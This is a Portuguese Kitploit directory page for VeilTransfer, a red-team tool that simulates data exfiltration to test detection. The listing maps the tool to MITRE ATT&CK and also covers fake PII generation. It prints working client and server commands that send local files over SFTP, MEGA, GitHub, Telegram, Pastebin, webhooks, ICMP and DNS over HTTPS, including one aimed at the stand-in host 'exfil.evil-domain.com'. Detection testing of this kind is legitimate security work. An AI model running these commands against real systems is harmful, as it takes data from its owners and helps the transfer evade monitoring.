Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
VeilTransfer — VeilTransfer é um utilitário de exfiltração de dados projetado para testar e aprimorar as capacidades de detecção. Esta ferramenta simula técnicas reais de exfiltração de dados usadas por atores de ameaças avançados, permitindo que organizações avaliem e melhorem sua postura de segurança. | Kitploit
Ferramentas/GitHubGitHub/infosecn1nja/veiltransfer
Exfiltração de DadosSegurança de RedeTestes de PenetraçãoRed Teaming
GitHubinfosecn1nja/veiltransfer

VeilTransfer

Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

Sobre

VeilTransfer é um utilitário de exfiltração de dados projetado para testar e aprimorar as capacidades de detecção. Esta ferramenta simula técnicas reais de exfiltração de dados usadas por atores de ameaças avançados, permitindo que organizações avaliem e melhorem sua postura de segurança.

1572216há 9 mesesRevisado pelo Kitploit
Compartilhar

VeilTransfer 2.0

O VeilTransfer é um utilitário de exfiltração de dados projetado para testar e aprimorar as capacidades de detecção. Esta ferramenta simula técnicas reais de exfiltração de dados usadas por atores de ameaças avançados, permitindo que organizações avaliem e melhorem sua postura de segurança. Ao aproveitar vários métodos de exfiltração, como MEGA, GitHub, SFTP, WebDAV e outros, o VeilTransfer ajuda a identificar lacunas em suas defesas e garante que suas soluções de segurança estejam preparadas para combater violações de dados modernas.

Métodos de Exfiltração Suportados

  • MEGA
  • GitHub
  • Dropbox
  • Telegram
  • Pastebin
  • WebDAV
  • Webhook
  • SFTP
  • FTP
  • DoH (DNS over HTTPS)
  • QUIC
  • ICMP

Mapeamento MITRE ATT&CK

IDTécnicas
T1029Scheduled Transfer
T1020Automated Exfiltration
T1132.001Data Encoding: Standard Encoding
T1560.002Archive Collected Data: Archive via Library
T1567.001Exfiltration Over Web Service: Exfiltration to Code Repository
T1567.002Exfiltration Over Web Service: Exfiltration to Cloud Storage
T1567.003Exfiltration Over Web Service: Exfiltration to Text Storage
T1567.004Exfiltration Over Web Service: Exfiltration Over Webhook
T1048.003Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol
T1048.002Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol

Recursos Adicionais

Geração de Dados Falsos

O VeilTransfer também suporta a geração de dados falsos, incluindo:

  • Números do Cartão de Identidade Indonésio (KTP): Gere números realistas de KTP e dados associados.
  • Informações de Cartão de Crédito: Crie detalhes falsos de cartão de crédito no formato PCI DSS, incluindo nome, sobrenome, CCN (Visa/MasterCard/AMEX) e data de validade.
  • Números de Seguro Social (SSN): Gere SSNs falsos para uso em simulações e ambientes de teste.
  • Prontuários Médicos: Gere dados falsos de prontuários médicos em indonésio (id) ou inglês (en).

Criação de Arquivos Zip

Crie facilmente arquivos zip para agrupar e compactar dados, que podem ser usados para exfiltração ou para testar diferentes cenários. Suporta divisão opcional em vários arquivos com base no tamanho.

Exemplos de Casos de Uso

  • Operações de Red Team: Implante o VeilTransfer durante exercícios de red team para desafiar as blue teams com cenários de exfiltração sofisticados e realistas.
  • Purple Team: Colabore com suas equipes defensivas para simular e depois detectar tentativas de exfiltração, refinando as táticas ofensivas e defensivas.
  • Testes de Segurança: Use o VeilTransfer para validar a eficácia de DLP, NDR, firewall e outras medidas de segurança de rede.

Exemplo de Uso

Transferência

Transferir um Arquivo via SFTP

Este exemplo demonstra como transferir um arquivo com segurança para um servidor remoto usando o protocolo SFTP. O arquivo está localizado na máquina local e é transferido para o diretório remoto especificado usando autenticação SSH.

veiltransfer_client transfer sftp -localPath (/path/to/file or /path/to/directory) -remoteDir /remote/path -server example.com:22 -username user -password pass

Transferir Arquivos para um Servidor WebDAV

Neste exemplo, arquivos de um diretório local são enviados para um servidor WebDAV. O servidor requer nome de usuário e senha para autenticação. O parâmetro server inclui o esquema de URI (https:// ou http://).

veiltransfer_client transfer webdav -localPath (/path/to/file or /path/to/directory) -remoteDir /remote/path -server http://webdav.example.com:8080 -username user -password pass

Transferir Arquivos para o Mega Cloud

Este exemplo mostra como transferir arquivos para o armazenamento Mega Cloud. Os arquivos são enviados de um diretório local especificado, e a autenticação é feita usando as credenciais do usuário no Mega Cloud.

veiltransfer_client transfer mega -localPath (/path/to/file or /path/to/directory) -username [email protected] -password megasecretpassword

Transferir Arquivos via FTP

Neste exemplo, um arquivo é enviado para um servidor FTP. O arquivo é transferido para um diretório específico no servidor remoto. O servidor requer nome de usuário e senha para autenticação.

veiltransfer_client transfer ftp -localPath (/path/to/file or /path/to/directory) -remoteDir /remote/path -server ftp.example.com:21 -username ftpuser -password ftppassword

Enviar um Arquivo para o Pastebin

Este exemplo demonstra como enviar o conteúdo de um arquivo para o Pastebin. O conteúdo é publicado no Pastebin usando uma chave de API fornecida pelo usuário.

veiltransfer_client transfer pastebin -localPath (/path/to/file or /path/to/directory) -apiKey your_pastebin_api_key

Enviar um Arquivo para um Repositório do GitHub

Este exemplo mostra como enviar um arquivo da máquina local para um repositório específico do GitHub. O arquivo é adicionado ao repositório usando o token de API do GitHub do usuário para autenticação.

veiltransfer_client transfer github -localPath (/path/to/file or /path/to/directory) -repo yourusername/repository -apiKey your_github_api_token

Enviar um Arquivo para um Canal do Telegram

Este exemplo demonstra como enviar um arquivo para um canal específico do Telegram. O arquivo é enviado usando um token de API de bot do Telegram, e a mensagem é entregue ao ID de canal especificado.

veiltransfer_client transfer telegram -localPath (/path/to/file or /path/to/directory) -telegramAPI your_telegram_bot_api_token -channelID 123456789

Enviar Dados para uma URL de Webhook

Neste exemplo, o conteúdo de um arquivo é enviado para uma URL de Webhook especificada.

veiltransfer_client transfer webhook -localPath (/path/to/file or /path/to/directory) -webhookURL https://webhook.site/your-webhook-url

Transferir Arquivos via DoH (DNS sobre HTTPS)

Para estabelecer um mecanismo seguro de exfiltração de dados utilizando DNS sobre HTTPS (DoH), os seguintes registros DNS devem ser configurados:

  1. Registro A: Aponte test para o endereço IP <VeilTransfer_IP_Address>.

    test -> <VeilTransfer_IP_Address>

  2. Registro NS: Defina um subdomínio (exfil) que seja gerenciado por evil-domain.com.

    exfil -> test.evil-domain.com

O domínio exfil.evil-domain.com servirá como o domínio de exfiltração DNS.

Em seguida, inicie o servidor VeilTransfer no modo DoH com o seguinte comando:

veiltransfer_server doh -key ag36rjsg284nfk2g -folder /root/data/exfil

Nota: A chave de criptografia (-key) deve ter 16 ou 32 caracteres.

Para enviar arquivos via DoH, verifique se o servidor VeilTransfer está ativamente em execução no modo DoH com uma chave de criptografia válida. Em seguida, inicie a transferência usando o comando do cliente:

veiltransfer_client transfer doh -localPath /path/to/file_or_directory -key ag36rjsg284nfk2g -dnsServer exfil.evil-domain.com

Transferir Arquivos via QUIC

Para iniciar o servidor VeilTransfer no modo QUIC, use o seguinte comando:

veiltransfer_server quic -cert /path/server.crt -key /path/server.key

Assim que o servidor estiver em execução, você pode enviar arquivos ou diretórios usando:

veiltransfer_client transfer quic -localPath (/path/to/file or /path/to/directory) -server example.com:443

Transferir Arquivos via ICMP

Para permitir transferências de arquivos via protocolo ICMP, inicie o servidor VeilTransfer no modo ICMP executando o seguinte comando:

veiltransfer_server_linux icmp -folder /path/folder

Assim que o servidor estiver ativo, execute o seguinte comando para transferir arquivos ou diretórios via ICMP:

veiltransfer_client_linux transfer icmp -localPath (/path/to/file or /path/to/directory) -server <ip address>

Criar Arquivos Zip

Baixar ferramenta